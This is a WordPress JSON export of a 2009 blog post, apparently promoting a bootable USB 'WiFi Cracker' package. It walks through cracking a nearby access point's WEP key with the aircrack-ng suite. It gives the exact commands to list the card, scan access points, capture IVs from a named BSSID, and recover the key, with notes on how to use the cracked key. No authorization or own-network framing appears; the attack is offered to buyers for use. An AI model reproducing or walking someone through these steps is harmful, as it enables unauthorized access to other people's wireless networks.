{"id":21,"date":"2009-04-20T12:26:12","date_gmt":"2009-04-20T09:26:12","guid":{"rendered":"http:\/\/www.usbhak.com\/usb\/?p=21"},"modified":"2009-04-20T14:17:12","modified_gmt":"2009-04-20T11:17:12","slug":"basic-4-commands","status":"publish","type":"post","link":"http:\/\/www.usbhak.com\/usb\/?p=21","title":{"rendered":"Basic 4 Commands"},"content":{"rendered":"<div id=\"attachment_25\" style=\"width: 164px\" class=\"wp-caption aligncenter\"><img aria-describedby=\"caption-attachment-25\" loading=\"lazy\" class=\"size-full wp-image-25\" title=\"WiFi Cracker\" src=\"http:\/\/www.usbhak.com\/usb\/wp-content\/2009\/04\/wifi.png\" alt=\"Open Source Linux\" width=\"154\" height=\"154\" srcset=\"http:\/\/www.usbhak.com\/usb\/wp-content\/2009\/04\/wifi.png 256w, http:\/\/www.usbhak.com\/usb\/wp-content\/2009\/04\/wifi-150x150.png 150w\" sizes=\"(max-width: 154px) 100vw, 154px\" \/><p id=\"caption-attachment-25\" class=\"wp-caption-text\">Open Source Linux<\/p><\/div>\n<ul>\n<li>\n<h3>Plug Both The USB Thumb (Flash) &amp; The USB WiFi-Cards.<\/h3>\n<\/li>\n<li>\n<h3>Set Your Laptop BIOS to Boot from USB.<\/h3>\n<\/li>\n<\/ul>\n<p>Note: ( If your laptop does not support this option then the rest of the details here are useless to read)<\/p>\n<p>I recommend that you disable your Internal Laptop WiFi-Card. because the Linux is Pre-Configured<\/p>\n<p>with the WiFi-Card inside the Package and detects it as (wlan0) or (eth0).<\/p>\n<ul>\n<li>\n<h3>From the Bootable Linux inside the Flash you will see the Selection MENU, choose:TEXT MODE PREFERRED. and the Operating System will BOOT. just wait for the Command Prompt to Login. Username is ROOT &amp; the Password is:\u00a0 TOOR<\/h3>\n<\/li>\n<li>After Loggin-in, run the Command:\u00a0 startx\u00a0\u00a0\u00a0 ,\u00a0 to run the X-Windows.<\/li>\n<li>Open 3 Terminal Windows (video Tutorial is Included inside the package.<\/li>\n<\/ul>\n<p>Here we will run the Commands to start:<\/p>\n<p>On the First Terminal Windows we will see which Device name is the WiFi-Card,<\/p>\n<p>root@slax:\u00a0 <span style=\"color: #ff6600;\"><strong>airmon-ng\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Press Enter<br \/>\n<\/strong><\/span><\/p>\n<p>you should see something similar to this:<\/p>\n<p><strong>Interface\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Chipset\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Driver<\/strong><\/p>\n<p><strong>eth0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ZyDAS\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 zd1211<\/strong><\/p>\n<p><strong>wlan0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Intel a\/b\/g\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 iwl3915<\/strong><\/p>\n<p>Our Customized Driver is the <span style=\"color: #ff6600;\">eth0<\/span> which you should remember as a Device Name of the WiFi-Card.<\/p>\n<p>then,\u00a0 we will run the second command On the first Terminal window which is SCANNING nearby Access Points.<\/p>\n<p>root@slax:\u00a0 <span style=\"color: #ff6600;\"><strong>airodump-ng eth0 \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Press Enter<\/strong><\/span><\/p>\n<p><span style=\"color: #ff6600;\"><strong><img loading=\"lazy\" class=\"aligncenter size-full wp-image-29\" title=\"Scanning Nearby Access Points\" src=\"http:\/\/www.usbhak.com\/usb\/wp-content\/2009\/04\/02airodump-ng.jpg\" alt=\"Scanning Nearby Access Points\" width=\"400\" height=\"284\" srcset=\"http:\/\/www.usbhak.com\/usb\/wp-content\/2009\/04\/02airodump-ng.jpg 400w, http:\/\/www.usbhak.com\/usb\/wp-content\/2009\/04\/02airodump-ng-300x213.jpg 300w\" sizes=\"(max-width: 400px) 100vw, 400px\" \/><\/strong><\/span><\/p>\n<p>Press Ctrl+C\u00a0\u00a0\u00a0\u00a0 To stop scanning<\/p>\n<p>Here\u00a0 we can see the Following:<\/p>\n<p><strong>BSSID:\u00a0 00:18:F7:4B:43:86<\/strong> The MAC Address of the Access Point we are Targetting.<\/p>\n<p><strong>ENC:\u00a0 WEP<\/strong> The Encryption method been used is WEP.<\/p>\n<p>Beacons: 8242\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 The DATA packets going inside\/outside the Access Point.<\/p>\n<p><strong>DATA: 242<\/strong> The Most Information we are looking for , which is the DATA to CRACK later.<\/p>\n<p>Now we will go for the Third Command on the second Terminal Window which is Collecting Enough <span style=\"color: #993300;\"><strong>DATA<\/strong><\/span> to CRACK not less 5000,<\/p>\n<p>we will run this command:<\/p>\n<p>root@slax:\u00a0 <span style=\"color: #ff6600;\"><strong>airodump-ng\u00a0 &#8211;bssid 00:18:f7:4b:43:86\u00a0 &#8211;ivs\u00a0 -w DUMP_FILE eth0 \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Press Enter<\/strong><\/span><\/p>\n<p>Note: one space between the command and syntex<\/p>\n<p style=\"text-align: center;\"><img loading=\"lazy\" class=\"aligncenter size-full wp-image-30\" title=\"Capturing Packets\" src=\"http:\/\/www.usbhak.com\/usb\/wp-content\/2009\/04\/03capturing.jpg\" alt=\"Capturing Packets\" width=\"642\" height=\"378\" srcset=\"http:\/\/www.usbhak.com\/usb\/wp-content\/2009\/04\/03capturing.jpg 642w, http:\/\/www.usbhak.com\/usb\/wp-content\/2009\/04\/03capturing-300x176.jpg 300w\" sizes=\"(max-width: 642px) 100vw, 642px\" \/><\/p>\n<p style=\"text-align: center;\">\n<p style=\"text-align: left;\">After some time, depending on the Traffic with the Access Point, we will collect enough DATA to crack<\/p>\n<p style=\"text-align: left;\">which is Minimum of 5000,\u00a0 the More the better and faster for cracking.<\/p>\n<p style=\"text-align: left;\">here we have collected more than 83000 which is enough for cracking.<\/p>\n<p style=\"text-align: left;\">\n<p style=\"text-align: left;\">\n<p><strong>Once We Collect enough DATA, we are ready to Crack it.<\/strong><\/p>\n<p><strong>On the Third Terminal Window we will run this command in order to get the password from the DUMP_FILE that we collected:<\/strong><\/p>\n<p>root@slax:\u00a0 <span style=\"color: #ff6600;\"><strong>aircrack-ng\u00a0 -b <\/strong><\/span><span style=\"color: #ff6600;\"><strong>00:18:f7:4b:43:86 <\/strong><\/span><span style=\"color: #ff6600;\"><strong> <\/strong><\/span><span style=\"color: #ff6600;\"><strong>DUMP_FILE-01.ivs<\/strong><\/span><span style=\"color: #ff6600;\"><strong> Press Enter<\/strong><\/span><\/p>\n<p style=\"text-align: center;\">\n<p style=\"text-align: center;\"><span style=\"color: #ff6600;\"><strong><img loading=\"lazy\" class=\"aligncenter size-full wp-image-33\" title=\"Cracking the Key\" src=\"http:\/\/www.usbhak.com\/usb\/wp-content\/2009\/04\/04crack.png\" alt=\"Cracking the Key\" width=\"670\" height=\"334\" srcset=\"http:\/\/www.usbhak.com\/usb\/wp-content\/2009\/04\/04crack.png 670w, http:\/\/www.usbhak.com\/usb\/wp-content\/2009\/04\/04crack-300x149.png 300w\" sizes=\"(max-width: 670px) 100vw, 670px\" \/><\/strong><\/span><\/p>\n<p style=\"text-align: left;\">\n<p style=\"text-align: left;\"><span style=\"color: #ff6600;\"><strong><span style=\"color: #000000;\">We can see the KEY here found.<\/span><\/strong><\/span><\/p>\n<p style=\"text-align: left;\"><span style=\"color: #ff6600;\"><strong><span style=\"color: #000000;\">Note:\u00a0 the KEY is presented on this form:\u00a0 8e:cc:28&#8230;&#8230;.etc.\u00a0\u00a0\u00a0 without the\u00a0 :<\/span><\/strong><\/span><\/p>\n<p style=\"text-align: left;\"><span style=\"color: #ff6600;\"><strong><span style=\"color: #000000;\">which will be as the following when used:\u00a0\u00a0\u00a0 8ecc28&#8230;&#8230;etc.<\/span><\/strong><\/span><\/p>\n<p style=\"text-align: left;\"><span style=\"color: #ff6600;\"><strong><span style=\"color: #000000;\"><br \/>\n<\/span><\/strong><\/span><\/p>\n<p><!--[if gte mso 9]><xml> <w:WordDocument> <w:View>Normal<\/w:View> <w:Zoom>0<\/w:Zoom> <w:PunctuationKerning \/> <w:ValidateAgainstSchemas \/> <w:SaveIfXMLInvalid>false<\/w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false<\/w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false<\/w:AlwaysShowPlaceholderText> <w:Compatibility> <w:BreakWrappedTables \/> <w:SnapToGridInCell \/> <w:WrapTextWithPunct \/> <w:UseAsianBreakRules \/> <w:DontGrowAutofit \/> <\/w:Compatibility> <w:BrowserLevel>MicrosoftInternetExplorer4<\/w:BrowserLevel> <\/w:WordDocument> <\/xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState=\"false\" LatentStyleCount=\"156\"> <\/w:LatentStyles> <\/xml><![endif]--><!--  \/* Style Definitions *\/  p.MsoNormal, li.MsoNormal, div.MsoNormal \t{mso-style-parent:\"\"; \tmargin:0in; \tmargin-bottom:.0001pt; \ttext-align:right; \tmso-pagination:widow-orphan; \tdirection:rtl; \tunicode-bidi:embed; \tfont-size:12.0pt; \tfont-family:\"Times New Roman\"; \tmso-fareast-font-family:\"Times New Roman\";} @page Section1 \t{size:8.5in 11.0in; \tmargin:1.0in 1.25in 1.0in 1.25in; \tmso-header-margin:.5in; \tmso-footer-margin:.5in; \tmso-paper-source:0;} div.Section1 \t{page:Section1;} --><\/p>\n<p><!--[if gte mso 10]> <mce:style><!   \/* Style Definitions *\/  table.MsoNormalTable \t{mso-style-name:\"Table Normal\"; \tmso-tstyle-rowband-size:0; \tmso-tstyle-colband-size:0; \tmso-style-noshow:yes; \tmso-style-parent:\"\"; \tmso-padding-alt:0in 5.4pt 0in 5.4pt; \tmso-para-margin:0in; \tmso-para-margin-bottom:.0001pt; \tmso-pagination:widow-orphan; \tfont-size:10.0pt; \tfont-family:\"Times New Roman\"; \tmso-ansi-language:#0400; \tmso-fareast-language:#0400; \tmso-bidi-language:#0400;} --><\/p>\n<p><!--[endif]--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Plug Both The USB Thumb (Flash) &amp; The USB WiFi-Cards. Set Your Laptop BIOS to Boot from USB. Note: ( If your laptop does not support this option then the rest of the details here are useless to read) I recommend that you disable your Internal Laptop WiFi-Card. because the Linux is Pre-Configured with the [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[5],"tags":[9,10],"_links":{"self":[{"href":"http:\/\/www.usbhak.com\/usb\/index.php?rest_route=\/wp\/v2\/posts\/21"}],"collection":[{"href":"http:\/\/www.usbhak.com\/usb\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.usbhak.com\/usb\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.usbhak.com\/usb\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.usbhak.com\/usb\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=21"}],"version-history":[{"count":9,"href":"http:\/\/www.usbhak.com\/usb\/index.php?rest_route=\/wp\/v2\/posts\/21\/revisions"}],"predecessor-version":[{"id":24,"href":"http:\/\/www.usbhak.com\/usb\/index.php?rest_route=\/wp\/v2\/posts\/21\/revisions\/24"}],"wp:attachment":[{"href":"http:\/\/www.usbhak.com\/usb\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=21"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.usbhak.com\/usb\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=21"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.usbhak.com\/usb\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=21"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}